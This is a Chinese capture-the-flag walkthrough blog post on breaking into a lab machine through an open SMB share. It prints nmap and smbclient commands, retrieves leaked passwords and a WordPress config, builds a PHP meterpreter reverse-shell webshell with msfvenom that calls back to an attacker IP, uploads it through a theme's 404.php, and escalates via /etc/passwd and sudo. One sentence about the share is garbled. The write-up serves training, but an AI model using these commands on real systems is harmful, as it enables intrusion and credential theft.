CTF夺旗 SMB信息泄露

本文详细介绍如何利用SMB协议对靶场机器进行渗透测试,包括信息探测、服务挖掘、登录及权限提升过程,最终获取敏感信息。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

SMB(Server Message Block)通信协议是微软(Microsoft)和英特尔(Intel)在1987年制定的协议,主要是作为Microsoft网络的通讯协议。后来Linux移植了SMB,并称为samba。

实验环境
1、Windows下虚拟机系统kali Linux,用了之后发现kali Linux系统里面的那些小软件特别多。
2、 靶场机器

我们的目的就是获取靶场机器上的flag

信息探测:

对于只是给定的一个对应ip地址靶场机器,我们需要对其进行扫描,探测开放的服务。

打开终端,输入
ifconfig
如下图所示:
在这里插入图片描述渗透其实是针对服务的漏洞探测,然后进行对应的数据包发送,获取机器的最高权限.

nmap -sV ip      挖掘开放服务信息

nmap -A -v -T4 ip     挖掘靶场全部信息

扫面之后发现, 端口开放了SMB服务,之后我们就可以进行登录 。登录时使用直接使用空密码。

指令如下:

smbclient -L ip

然后下面就会紧跟着打印驱动、一个共享文件夹(share$)、一个空连接。
然后进行如下指令打开共享文件夹:

smbclient '\\ip\share$'

输入指令ls查看共享的文件夹。发现share 里 发 现 许 多 敏 感 文 件 , 用 g e t 下 载 下 来 到 本 地 查 看 基 本 语 法 g e t 后 加 打 开 s h a r e 里发现许多敏感文件,用get 下载下来到本地查看 基本语法 get后加打开share getgetshare里面的文件名。
例如 deets.txt
然后另外打开终端新窗口输入 cat deets.txt 然后可以发现泄露了一个密码12345;
wordpress目录下的config是个配置文件(小文件用cat看,大文件用gedit看)(一般配置文件都是泄露了用户名和密码),发现泄露了数据库的用户名和密码。

制作webshell
基本语法:
msfvenom -p php/meterpreter/reverse_tcp lhost=攻击机IP地址 lport=4444 -f raw > /root/Desktop/shell.php
启用监听:
msf > use exploit/multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 攻击机IP地址
msf exploit(handler) > set lport 4444
msf exploit(handler) > run

上传webshell
一般会使用 dirb ip 进行网站探测
使用找到的敏感信息登录系统后台,上传webshell。执行webshell(访问具有webshell的php页面)

获得反弹的shell

wordpress 上传点 theme 404.php
执行:http://靶场IP/wordpress/wp-content/themes/twentyfourteen/404.php

查找flag信息:
查找敏感信息,提升root权限,查看flag值。
优化终端:python –c “import pty; pty.spawn(”/bin/bash")’
查找用户名: cat /etc/passwd
查找密码: 在共享目录下的敏感文件,提升权限
用于切换 su 用户名(上述查找的用户名)
sudo –l 查看上述su有哪些操作
su sudo 提升权限

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值